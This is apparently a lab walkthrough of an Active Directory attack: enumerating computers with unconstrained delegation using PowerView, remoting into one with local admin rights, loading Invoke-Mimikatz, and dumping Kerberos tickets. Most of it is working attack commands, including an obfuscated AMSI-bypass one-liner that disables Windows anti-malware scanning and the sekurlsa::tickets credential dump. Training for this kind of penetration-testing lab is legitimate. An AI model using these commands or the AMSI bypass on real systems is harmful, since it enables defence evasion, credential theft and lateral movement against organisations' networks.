now enumerating the computers which have unconstrained delegation enabled

. .\\powerview.ps1

Get-NetComputer -Unconstrained

as we see we have the computer WIN-Q4788GPE9L7 with unconstrained delegation enabled

Find-LocalAdminAccess

now as we see our user have local admin access to at the computer with unconstrained delegation

so let’s abuse this now and try to dump it’s secrets

Enable-PSRemoting

$sess = New-PSSession -ComputerName WIN-Q4788GPE9L7

Invoke-Command -FilePath ..\\..\\rem01x.crtp\\Desktop\\tools\\Invoke-Mimikatz.ps1 -Session $sess

Enter-PSSession -Session $sess

now let’s bypass AMSI

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

now let’s try to dump the secrets

now let’s list all the available tickets

Invoke-Mimikatz -Command '"sekurlsa::tickets"'